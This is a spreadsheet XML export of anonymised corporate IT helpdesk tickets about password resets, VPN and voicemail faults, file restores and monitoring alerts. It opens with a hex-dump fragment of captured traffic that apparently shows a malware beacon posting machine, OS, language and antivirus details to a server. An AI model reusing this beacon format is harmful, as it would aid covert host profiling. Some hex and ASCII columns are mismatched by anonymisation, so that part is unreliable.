0000a0    5573 6572 2SID_29 6765 6e74 3a20 4d6f 7a69    user-agent:.mozi_x000D_
0000b0    6c6c 612f 352e 3020 2863 6f6d 7061 7469    lla/5.0.(compati_x000D_
0000c0    626c 653b 204d 5349 4520 362e 303b 2057    ble;.msie.6.0;.w_x000D_
0000d0    696e 646f 7773 204e 5420 352e 313b 2053    indows.nt.5.1;.s_x000D_
0000e0    5632 290d 0a43 6f6e 7465 6e74 2d54 7970    v2)..content-typ_x000D_
0000f0    653a 2061 7070 6c69 6361 7469 6f6e 2f78    e:.application/x_x000D_
000100    2d77 7777 2d66 6f72 6d2d 7572 6c65 6e63    -www-form-urlenc_x000D_
000110    6f64 6564 0d0a 436f 6e74 656e 742d 4c65    oded..content-le_x000D_
000120    6e67 7468 3a20 3132 370d 0a0d 0a4e 4f4d    ngth:.127....nom_x000D_
000130    453d 4c50 414c 3834 3035 3731 3626 534f    e=lpal9516827&amp;so_x000D_
000140    3d57 494e 3130 2644 4154 413d 3038 2f30    =win10&amp;data=08/0_x000D_
000150    382f 3230 3136 2031 353a 3439 3a33 3626    8/2016.15:49:36&amp;_x000D_
000160    5653 3d39 2649 4449 4f4d 413d 506f 7274    vs=9&amp;idioma=port_x000D_
000170    7567 75ea 7320 2842 7261 7369 6c29 2641    ugu.s.(south_amerirtca)&amp;a_x000D_
000180    4e54 493d 7b57 494e 444f 5753 7d20 2650    nti={windows}.&amp;p_x000D_
000190    4c55 4749 4e3d 2d49 5426 4944 4358 3d43    lugin=-it&amp;idcx=c_x000D_
0001a0    584c 5b30 322d 3038 2d31 365d              xl[02-08-16]_x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t xml:space="preserve">engineering tool stops working several times a day, falls without apparent reason and works slow when it succeeds stay running._x000D_
please see attached a print screen of the error._x000D_
</t>
  </si>
  <si>
    <t>abend batch job in job_scheduler :bkbackup_tool_HostName_770_prod_inc</t>
  </si>
  <si>
    <t>job name:bkbackup_tool_HostName_770_prod_inc</t>
  </si>
  <si>
    <t>please move client from office 2010 to 2016 per sdxjiwlq ynowzqfh</t>
  </si>
  <si>
    <t>rxoqczbj glanwbvu</t>
  </si>
  <si>
    <t>ticket_no1539670 - ticket update</t>
  </si>
  <si>
    <t>please instal printer pa15 at these laptop</t>
  </si>
  <si>
    <t>restore a file</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nwbhomqe.ejavblzu@gmail.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
please restore the excel file "sc drill catalog 2016-05-31"_x000D_
from my home drive o:\solid carbide drills&lt;file:///\\eagclhome\martif1$\solid%20carbide%20drills&gt;_x000D_
from yesterday._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>nwbhomqe ejavblzu</t>
  </si>
  <si>
    <t>unable to connect to wifi from a hotel // dell 7350</t>
  </si>
  <si>
    <t>access to insertapps and corporate technology drives</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uterqfld.ufmtgndo@gmail.com_x000D_
_x000D_
who would i contact at corporate to get access for ldpequhm nqclatbw and alex campbell to the following servers_x000D_
_x000D_
_x000D_
_x000D_
teams://HostName_771/tech center grade specifications/ceramdntyic specs_x000D_
_x000D_
access is needed to support manufacturing and technology._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>zrbxcndu lxrsoenp</t>
  </si>
  <si>
    <t>audio not working on dell 7350 tablet</t>
  </si>
  <si>
    <t>unable to create reports in ticketing_tool</t>
  </si>
  <si>
    <t xml:space="preserve">i am unable to create/save new reports in ticketing_tool. </t>
  </si>
  <si>
    <t>qfrntose ivnhumzj</t>
  </si>
  <si>
    <t>unable to boot up the laptop</t>
  </si>
  <si>
    <t>unable to sign in to skype and outlook</t>
  </si>
  <si>
    <t>HostName_1132:wrong number of instances of process *epmsystem2.exe*, expected 2 - found 1</t>
  </si>
  <si>
    <t>error in customer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aiobpkzm.rmfjwtpl@gmail.com_x000D_
_x000D_
good morning_x000D_
_x000D_
the customer 81908859, must to include the next data:_x000D_
dana manufacturing luxembourg_x000D_
division enco / immex 488-2007_x000D_
vat reg. no. lu38092497_x000D_
dmc750410c41_x000D_
_x000D_
but know we have these one:_x000D_
dana de mexico corporacion mexico srl_x000D_
de cv / division enco / immex 488-2007_x000D_
vat reg. no. lu38092497_x000D_
dmc750410c41_x000D_
and these data is wrong._x000D_
_x000D_
[cid:image003.png@01d1f222.eSID_5356b0][cid:image002.png@01d1f222.cb378bc0]_x000D_
_x000D_
what can i do to get the real information_x000D_
_x000D_
this information is in the customer_x000D_
_x000D_
[cid:image004.png@01d1f222.eSID_5356b0]_x000D_
_x000D_
please let me know if you can help me_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hub home page regional news does not have amerirtcas option</t>
  </si>
  <si>
    <t>see att</t>
  </si>
  <si>
    <t>issues with internet explorer which is freezing all the time</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jnqmvard.jiazxvcl@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need erp password reset. i am getting the error when logging into engineering tool that i have attempted to many times with the wrong password (old password).</t>
  </si>
  <si>
    <t>a supplier told me that i have no warehouse_toolmail (x5380).  matheywt kaufsfthyman is also having the same problem (x4465)</t>
  </si>
  <si>
    <t>koiapqbg teyldpkw, matheywt kaufsfthyman , phone system warehouse_toolmail</t>
  </si>
  <si>
    <t>desk phone warehouse_toolmail</t>
  </si>
  <si>
    <t xml:space="preserve">when accessing my warehouse_toolmail, i receive a busy signal.  the red warehouse_toolmail light is activated on my phone, when i push the button a busy signal is received._x000D_
_x000D_
others are having the same issues.  </t>
  </si>
  <si>
    <t>psgqitwu ribvmtfk</t>
  </si>
  <si>
    <t xml:space="preserve">date of email: 07/20/2016 (i have attached both email, the one i sent and was not delivered and the other i have received with the delivery error message)_x000D_
sender's name: uidgt olibercsu (kbnfxpsy.gehxzayq@gmail.com)_x000D_
recipient if not caller: jgnxyahz cixzwuyf (jgnxyahz.cixzwuyf@gmail.com)_x000D_
delivery failure code: 0x9115121f-0x9115121f-0x000501_x000D_
delivery failure text:sua mensagem nÃ£o foi recebida por um ou mais dos destinatÃ¡rios._x000D_
_x000D_
      assunto: enc: curso: "customer logistics services (cls)"_x000D_
      enviada em: 20/07/2016 19:56_x000D_
_x000D_
nÃ£o Ã© possÃ­vel encontrar os seguintes destinatÃ¡rios:_x000D_
_x000D_
      jgnxyahz cixzwuyf em 20/07/2016 19:56_x000D_
            esta mensagem nÃ£o pÃ´de ser enviada. tente enviar a mensagem novamente mais tarde ou contate o administrador da rede. o erro a operaÃ§Ã£o do cliente falhou. Ã© [0x9115121f-0x9115121f-0x000501]._x000D_
</t>
  </si>
  <si>
    <t>access database error.</t>
  </si>
  <si>
    <t>access database error. attached.</t>
  </si>
  <si>
    <t>ycdfqokg jxohikdz</t>
  </si>
  <si>
    <t>HostName_1132: average (5 samples) memory usage is now 95%, which is above the error threshold (95%)</t>
  </si>
  <si>
    <t>HostName_1132: average (5 samples) memory usage is now 95%, which is above the error threshold (95%)_x000D_
                      swap memory usage is now 90.80%, which is above the warning threshold (75%)</t>
  </si>
  <si>
    <t>my telephone does not have a dial tone and i cannot pick up warehouse_tool mail messages</t>
  </si>
  <si>
    <t xml:space="preserve">i am having issues with being disconnected every few minutes from outlook, i cannot send or recive email or search when </t>
  </si>
  <si>
    <t>i am having issues with being disconnected every few minutes from outlook, i cannot send or receive email or search when it disconnects.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: trgqbeax.hfyzudql@gmail.com_x000D_
_x000D_
please restore from august 5th 2016_x000D_
_x000D_
westes$(\\HostName_598&lt;file:///\\HostName_598&gt;) / betriebliche regelungen und bv / bv / anlage 2a bv bonus im ad fy17.docx_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
danke + viele grÃ¼ÃŸe_x000D_
trgqbeax hfyzudql_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen |  best </t>
  </si>
  <si>
    <t>o outloock nÃ£o esta funcionando.</t>
  </si>
  <si>
    <t>mensagem de erro:" infelizmente, o outlook encontrou um erro que o estÃ¡ impedindo de funcionar corretamente. como resultado, outlook deverÃ¡ ser fechado. gostaria que fizÃ©ssemos o reparo agora? com trÃªs botÃµes que sÃ£o: reparar agora/ fechar/ ajuda"</t>
  </si>
  <si>
    <t>jidhewlg jufskody</t>
  </si>
  <si>
    <t>warehouse_toolmail not working</t>
  </si>
  <si>
    <t>my warehouse_toolmail does not seem to be picking up incoming calls.  my number is 724.  i attempted to uacyltoe hxgaycze this by calling from my cell phone.  after 10 rings, the warehouse_toolmail still did not pick up.</t>
  </si>
  <si>
    <t>setting of ooo for another mail box</t>
  </si>
  <si>
    <t>setting of ooo for another mail box
summary:need out off office for an employee who does not work in company any longer</t>
  </si>
  <si>
    <t>user hajghtdul unable to connect via vpn. unable to access distributor_tool and distributor_tool qa.</t>
  </si>
  <si>
    <t>i have changed my passwords using password_management_tool password manager. after the passwords change i am unable to connect via vpn _x000D_
my user id is hajghtdul.</t>
  </si>
  <si>
    <t>warehouse_toolmail not possible on phone set</t>
  </si>
  <si>
    <t>group by does not work in the new modern look  see attached image</t>
  </si>
  <si>
    <t xml:space="preserve">my site does not show the grouping by the first level and at the second level is continuous._x000D_
further, the expand arrows are not responsive._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 unlock request </t>
  </si>
  <si>
    <t>update on inplant_848628</t>
  </si>
  <si>
    <t>ldism004(usa village(claapdico)-robot) is inactive since 07:14 am et on 08/09</t>
  </si>
  <si>
    <t>setup new ws \xaqzisrk ahbgjrqz</t>
  </si>
  <si>
    <t>warehouse_toolmail related to my office phone is not functioning.</t>
  </si>
  <si>
    <t>the warehouse_toolmail associated with my office phone is not functioning properly.  when trying to access warehouse_toolmail from my office phone, i receive a "not possible" message on my phone.  i have also tried to access warehouse_toolmail from the number and receive a message that states that my call cannot be completed at this time.</t>
  </si>
  <si>
    <t>handheld wireless device activation iphone 5s</t>
  </si>
  <si>
    <t>need file restored on a network/nt drive HostName_771</t>
  </si>
  <si>
    <t>need file restored on a network/nt drive._x000D_
_x000D_
1) what is the file's full pathname   techcenter projects_x000D_
_x000D_
2) what server/drive is it on HostName_771_x000D_
_x000D_
_x000D_
3) from what backup date or last modified date do you want the file restored ?  if unsure, the most recent backup date will be used. _x000D_
_x000D_
4) do you want the entire folder restored ?  if not, you must provide the specific filename to restore . yes_x000D_
_x000D_
5) if the backup tape is not onsite, is it ok to allow 1-2 business days to retrieve the offsite tape ?  extra charges apply for emergency delivery. _x000D_
_x000D_
6) do you want this filename and/or folder restored to its original place and with its original name, in other words an overwrite will be done. _x000D_
if not, then you need to supply the new name and location to restore it to. _x000D_
_x000D_
note:  a 30-day maximum backup is available.  this is for file restores.  exception only being HostName_768 &amp; HostName_770, as they are kept for 1 year.</t>
  </si>
  <si>
    <t xml:space="preserve">need access for utislgov fetaqndw </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zjawqgcs.tohqcxla@gmail.com_x000D_
_x000D_
hi there,_x000D_
_x000D_
we want give utislgov fetaqndw utislgov.fetaqndw@gmail.com&lt;mailto:utislgov.fetaqndw@gmail.com&gt; the same access as i have for \\HostName_1337\departments drive._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unlock erp SID_34 erp production account</t>
  </si>
  <si>
    <t>vmidjaxk boarxyps</t>
  </si>
  <si>
    <t>revisar pc lpaw8515845 (g0rfv12) usadtto dfsdpor ffthhiago frsilva</t>
  </si>
  <si>
    <t xml:space="preserve">usar microsoft update _x000D_
atualizar adobe acrobat, adobe flash e java_x000D_
revisar grupos_x000D_
revisar e atualizar sep_x000D_
revisar patching_antivirus_sw_x000D_
revisar erp client_x000D_
executar check disk, defrag e scan do sep_x000D_
atualizar drivers dell_x000D_
verificar se hÃ¡ atualizaÃ§Ã£o/nova versÃ£o do pacote office no o365_x000D_
_x000D_
uacyltoe hxgayczear acessos ao itau, caixa e hsbc. uacyltoe hxgayczear abertura de plaghynilhas do itaÃº.  </t>
  </si>
  <si>
    <t xml:space="preserve">seep installation </t>
  </si>
  <si>
    <t>vvfrtgarnb  - account disabled : account needs to be enabled till 12th aug</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dctviemg.muapxkns@gmail.com_x000D_
_x000D_
please enable bahbrgy' account aerp.  he is not leaving company until this friday.  i do not know why his account was disabled today._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>account disabled for user vvfrtgarnb</t>
  </si>
  <si>
    <t>unable to connect to wifi.</t>
  </si>
  <si>
    <t>close telephony_software between 16:30 and 17:30 local time due to kick off dinner</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
would you please close telephony_software for turkey between 16:30 and 17:30 local time due to kick off dinner? it was approved by djpwfxzt cfkwxlmq?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">distributor_tool: company issue and engineering_tool issue </t>
  </si>
  <si>
    <t>reset passwords for wptbgchj jutpdcqf using password_management_tool password reset.</t>
  </si>
  <si>
    <t>wptbgchj jutpdcqf</t>
  </si>
  <si>
    <t>unable to connect vpn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zrpemyab.xvzwcbha@gmail.com_x000D_
_x000D_
dear sir/madam,_x000D_
_x000D_
i am unable to access vpn._x000D_
_x000D_
please refer below message_x000D_
_x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d1f26d.749a4780]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>my symantec management agent is disabled</t>
  </si>
  <si>
    <t xml:space="preserve">npc311101328 maintain plant value tasks assigned to jimdghty beshryu. error  </t>
  </si>
  <si>
    <t xml:space="preserve">npc311101328 information from jimdghty beshryu:  i have tried to complete the task.  i recruited the help of the usa planners who usually do that step.  they tell me that all of the tasks they do are complete with this item.  product engineering was able to complete their task that cannot be done (based on what i have been told) until the planners finish their task. </t>
  </si>
  <si>
    <t>display settings issue.</t>
  </si>
  <si>
    <t xml:space="preserve">display setting issue </t>
  </si>
  <si>
    <t xml:space="preserve">idg password reset not possible. </t>
  </si>
  <si>
    <t xml:space="preserve">idg password reset not possible. _x000D_
</t>
  </si>
  <si>
    <t>xuymwdbn polhsczj</t>
  </si>
  <si>
    <t>can't print drawing</t>
  </si>
  <si>
    <t>when attempting to print 71877338 from eu locations, a "missing sheet" page is being printed._x000D_
_x000D_
my guess is that although the drawing is in fr status, all originals still reside in cadb storage,</t>
  </si>
  <si>
    <t>i can not log into erp hcm via the vpn</t>
  </si>
  <si>
    <t>i'm connected to the vpn, but i can not log into erp.  i keep getting the error message that seems to imply that i am not connected to the vpn.  any help is appreciated.</t>
  </si>
  <si>
    <t>mcjqespd ldwsmjgx</t>
  </si>
  <si>
    <t>attached mail is saved on desktop as template with a text and signature. but when sent, nothing is to be seen.</t>
  </si>
  <si>
    <t>business_client login</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
kindly help me out on access drawing search â€“ to view and download in business_client utility._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_973:(hr_tool tax_interface app - qa ) total cpu is now 100.00%, since 4:51 am on 8/9 et </t>
  </si>
  <si>
    <t>HostName_973:(hr_tool tax_interface app - qa ) total cpu is now 100.00% which is above the error threshold (99%)</t>
  </si>
  <si>
    <t>bildschirm am kyocera arbeitsplatz defekt</t>
  </si>
  <si>
    <t>bitte austauschen</t>
  </si>
  <si>
    <t>setup new ws \rxpjomyf hvolsgqn</t>
  </si>
  <si>
    <t>rxpjomyf hvolsgqn</t>
  </si>
  <si>
    <t>setup new ws \pnwbkitv phbnwmkl</t>
  </si>
  <si>
    <t>pnwbkitv phbnwmkl</t>
  </si>
  <si>
    <t>setup new ws \wyighrjl xcwavhyu</t>
  </si>
  <si>
    <t>wyighrjl xcwavhyu</t>
  </si>
  <si>
    <t>setup new ws \beosjgxt mdevcqjk</t>
  </si>
  <si>
    <t>beosjgxt mdevcqjk</t>
  </si>
  <si>
    <t>erp 730 issue.</t>
  </si>
  <si>
    <t>my erp gui  got updated today, after that  i am not able to save   any data  to  desktop.  please help.</t>
  </si>
  <si>
    <t>vazmgjxu nmsycblo</t>
  </si>
  <si>
    <t>lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe.</t>
  </si>
  <si>
    <t>lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe, expected instances gte 1 but found 0_x000D_
at time: 08/09/16 04:51:34 am, est</t>
  </si>
  <si>
    <t>apylmhrq gyncwpim</t>
  </si>
  <si>
    <t>company guest account not working which was created yesterday.</t>
  </si>
  <si>
    <t>user account is locked</t>
  </si>
  <si>
    <t>unable to login windows.</t>
  </si>
  <si>
    <t xml:space="preserve">not able to hear any thing </t>
  </si>
  <si>
    <t>mobile device activation request for user :eqtofwbm mojfbwds : eqtofwbm.mojfbwds@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wauhocsk.vxuikqaf@gmail.com_x000D_
_x000D_
dear friends_x000D_
_x000D_
please find below enclosed request_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>i cannot connect the network printer vh41</t>
  </si>
  <si>
    <t>updated win10 uacyltoe hxgaycze machine eaglt000500 with recent "anniversary update" - need lauacyltoe hxgaycze sep version 12.1.6 mp5 or higher</t>
  </si>
  <si>
    <t xml:space="preserve">hello antivirus team,_x000D_
_x000D_
my win10 uacyltoe hxgaycze machine eaglt000500 has automatically updated to the recent win10 "anniversary update" - sep 12.1.6 mp3 is no longer working._x000D_
this is an official company it win10 uacyltoe hxgaycze machine._x000D_
_x000D_
as per symantec technical support forum, windows 10 anniversary update requires at least sep version 12.1.6 mp5 or higher. please download and provide the software on the following share:_x000D_
_x000D_
\\eagcldaten\public\roedel\symantec_endpoint_protection_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">mobile device activation ; personal device </t>
  </si>
  <si>
    <t>vzogmube rnxwkfvo</t>
  </si>
  <si>
    <t>data restore</t>
  </si>
  <si>
    <t>restore the data files from external hard disk to reimaged laptop.</t>
  </si>
  <si>
    <t>polycom realpresence destop"</t>
  </si>
  <si>
    <t>polycom software installation on desktop</t>
  </si>
  <si>
    <t xml:space="preserve">ad locked out </t>
  </si>
  <si>
    <t>eagw8111224 shows defective system files - reinstall with lauacyltoe hxgaycze fy17 win7_x64 image</t>
  </si>
  <si>
    <t>terminate action for suzjhmfa swmiynoz has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">from: jusfrttin gtehdnyuerrf [mailto:system@hr_tool.com] _x000D_
sent: tuesday, august 09, 2016 12:05 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad - the terminate action for suzjhmfa swmiynoz has completed._x000D_
_x000D_
hello , _x000D_
_x000D_
a termination for suzjhmfa swmiynoz, 11172383, effective 07/30/2016  has been approved._x000D_
_x000D_
click the link to view._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>request you to reset my password of password_management_tool- could not login and reset my password .</t>
  </si>
  <si>
    <t>request you to reset my password of password_management_tool  as soon as possible._x000D_
 could not login and reset my password .</t>
  </si>
  <si>
    <t>reset passwords for prgthyuulla ramdntythanjesh using password_management_tool password reset.</t>
  </si>
  <si>
    <t>the terminate action for kjtqxroc taqekwrd has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">from: jusfrttin gtehdnyuerrf [mailto:system@hr_tool.com] _x000D_
sent: tuesday, august 09, 2016 11:25 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:the terminate action for kjtqxroc taqekwrd has completed._x000D_
_x000D_
hello , _x000D_
_x000D_
a termination for kjtqxroc taqekwrd, 11145798, effective 06/25/2016  has been approved._x000D_
_x000D_
click the link to view._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>logon to server HostName_583 not possible</t>
  </si>
  <si>
    <t>logon to server HostName_583 not possible - server is in a loop at the welcome screen</t>
  </si>
  <si>
    <t>lean event</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ikerxqwz.prkyuitl@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
while forwarding     lean event  updation  , i find the mail is not being forwarded and some message is displayed ._x000D_
_x000D_
please check and advise_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1f231.a3024791]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>aw: [ticket#2016080878000153] wg: po#4505612440</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qyndvmlw.imcvznow@gmail.com_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / with kind </t>
  </si>
  <si>
    <t xml:space="preserve">network outage, russia ru, company-russia-vpn-rtr(10.46.0.21) showing down since 12:59 am edt on 08/09/16 (no backup ckt.) </t>
  </si>
  <si>
    <t>what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________12:59 am edt on 08/09/16______________x000D_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__na______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____yes_____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_________________________       _x000D_
_x000D_
12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?___na_____    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>emea files not processed as per schedule - check &amp; let us know the reasons.; please include mail notification.</t>
  </si>
  <si>
    <t xml:space="preserve">hi pradtheyp,_x000D_
_x000D_
we have not received the production feed files for emea today. please check from your end and re-send the files to us._x000D_
_x000D_
also, we would like to know whether it will be possible that an automatic notification is sent to the concerned people in case the extraction programdnty fails._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>purchasing mdm import manager did not work correctly</t>
  </si>
  <si>
    <t>mapping was not possible anymore</t>
  </si>
  <si>
    <t>unable to open sales orders attachments - save abap reports and can't view desktop attachments through erp</t>
  </si>
  <si>
    <t>issue 1 - after erp update on 8.8.2016 (a system prompt, to fix the issue of SID_55 &amp; SID_50 log on)  i am unable to open/view sales order outlook email attachments (refer attachment download error) in va02,va03 and as per error if out look is closed &amp; try to open the attachment, system is prompting to install outlook 2010(refer outlook installation prompt) _x000D_
_x000D_
issue 2 - excel file downloaded after running abap query, i am unable to save or save to computer._x000D_
_x000D_
issue 3 -  unable to view files saved on desktops to attachÃ© them to sales order in va02/va03</t>
  </si>
  <si>
    <t>aqwdfvrb oiajztbq</t>
  </si>
  <si>
    <t>wg: [ticket#2016080878000153] wg: po#4505612440</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tvmlrwkz.rsxftjep@gmail.com_x000D_
_x000D_
hallo zusammen,_x000D_
_x000D_
siehe nachstehenden email schriftverkehr, bitte scghhnellstens beheben._x000D_
danke._x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>not able to access attendance_tool application - ticket reference ticket_no0428293</t>
  </si>
  <si>
    <t xml:space="preserve">name:aryndruh
language:
browser:microsoft internet explorer
email:wjbtlxry.gdbqzjyw@gmail.com
customer number:
telephone:+91 
summary:not able to access attendance_tool application - ticket reference ticket_no1539304
</t>
  </si>
  <si>
    <t>bios einstellung</t>
  </si>
  <si>
    <t>bitte an wzs 60 (wza, m14, m12.18990) bios so Ã¤ndern das nach netz reset der rechner selbststÃ¤ndig startet.
bitte um erledigung durch m. himghtmelreich.</t>
  </si>
  <si>
    <t>networking issue at customer site</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vkzwibco.pueyvhoi@gmail.com_x000D_
_x000D_
dear ms. ragsbdhryu,_x000D_
_x000D_
in-line with our telephonic conversation, please find below the following details_x000D_
_x000D_
_x000D_
1)      there are two computers â€“ machine pc and a laptop_x000D_
_x000D_
2)      these two are connected using a lan cable_x000D_
_x000D_
3)      the name of the laptop is visible in the 'my networks' page of machine pc_x000D_
_x000D_
4)      but, the name of the machine pc is not visible in the network of the laptop_x000D_
_x000D_
5)      we are unable to set the domain name and workgroup in settings of control panel_x000D_
_x000D_
_x000D_
please sort this out on priority._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>call routing to german support agents</t>
  </si>
  <si>
    <t>call routing to german support agents was fixed once the workgroup was added and percent allocated</t>
  </si>
  <si>
    <t>frequent account lockouts</t>
  </si>
  <si>
    <t>frequent account lockouts
contact no:- 
chg1144616
ctask0026859</t>
  </si>
  <si>
    <t>ymepzlno eobardlm</t>
  </si>
  <si>
    <t>lwuhfjsq ltanywzq</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1142 at 08/09/16 00:07:26</t>
  </si>
  <si>
    <t>internet explorer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: peojqgvm.qayeptuo@gmail.com_x000D_
_x000D_
i need help installing the lauacyltoe hxgaycze internet explorer._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34
enter user id of user having the issue: user hghjnlabel in locked  we needs to release user or reset password 
transaction code(s) the user needs or was working with:
describe the issue:
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t>tlowkghn jcefuzit</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_549 at 08/08/16 23:22:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bkwin_search_server_prod_daily</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkwin_search_server_prod_daily at 08/08/16 23:16:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_50filesys</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_50filesys at 08/08/16 23:03:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1305</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1305 at 08/08/16 22:43:25</t>
  </si>
  <si>
    <t>uplmtybe pdmwyoil</t>
  </si>
  <si>
    <t>need to upgrade the outlook</t>
  </si>
  <si>
    <t>name:dehnfyru
language:
browser:microsoft internet explorer
email:uvjpaeli.bnphqsxr@gmail.com
customer number:
telephone:
summary:need to upgrade the outlook 2013</t>
  </si>
  <si>
    <t>company\orshop_floor_app locked out for too many tries of wrong password</t>
  </si>
  <si>
    <t>multiple computers use the same log in. company\orshop_floor_app locked out</t>
  </si>
  <si>
    <t xml:space="preserve"> Job_2049e:was running longer than 30 minutes,kirtyled and rerun</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2049e at 08/08/16 22:00:26</t>
  </si>
  <si>
    <t xml:space="preserve">delete sto 5018072616 &amp; 5018966647 </t>
  </si>
  <si>
    <t xml:space="preserve">from: johthryugftyson hu _x000D_
sent: tuesday, august 09, 2016 6:16 am_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: qgrbnjiu hidzlfma_x000D_
subject: fw: delete sto 5018072616 &amp; 5018966647 _x000D_
_x000D_
it help,_x000D_
_x000D_
we need delete both sto 5018072616 &amp; 5018966647 , but get same error message as screen below._x000D_
_x000D_
now we block them to avoid unnessary dn to be created._x000D_
_x000D_
please help check how we can delete them,  </t>
  </si>
  <si>
    <t>ticket update for pmqansex nvihmbwc</t>
  </si>
  <si>
    <t xml:space="preserve">from: rakthyesh ramdntythanjesh 
sent: tuesday, august 09, 2016 6:02 am
to: ugyothfz ugrmkdhx
cc: pmqansex nvihmbwc
subject: ticket_no1520236-create email account for employee gzwasqoc gadisyxr
good morning safrgyynjit,
user called to service desk and requested to expedite the issue, kindly take this request on priority and assist user.
kind </t>
  </si>
  <si>
    <t>inquiry on etime login</t>
  </si>
  <si>
    <t>nkademwy ihsepkwz</t>
  </si>
  <si>
    <t>shop floor pc locked : coshopfloor3</t>
  </si>
  <si>
    <t>mljbrewk oejwkbrt</t>
  </si>
  <si>
    <t>symantec endpoint encryption page-unable to login</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1320 at 08/08/16 19:46:28</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bkwin_HostName_768_inc</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkwin_HostName_768_inc at 08/08/16 19:29:27</t>
  </si>
  <si>
    <t>multiple processes are showing down on HostName_1288-hana-SID_59 since 7:05 pm on 08/08 et</t>
  </si>
  <si>
    <t xml:space="preserve">multiple processes are showing down on HostName_1288-hana-SID_59 since 7:05 pm on 08/08 et_x000D_
process hdbnameserver is not running_x000D_
process hdbxsengine is not running_x000D_
process hdbpreprocessor is not running_x000D_
process hdbcompileserve is not running_x000D_
process hdbindexserver is not running_x000D_
process hdb.erpSID_59_hdb0 is not running_x000D_
</t>
  </si>
  <si>
    <t>zdis discounts do not appear</t>
  </si>
  <si>
    <t>zdis discounts are not applying and should be.  zdis isn't even showing as a condition and should be.  this is causing incorrect sales orders and orders to be placed on hold.  _x000D_
please see the following sales orders.  _x000D_
35892987.  _x000D_
35891192 items 20 and 50-80.  _x000D_
quote 3116213902 items 20 &amp; 40.</t>
  </si>
  <si>
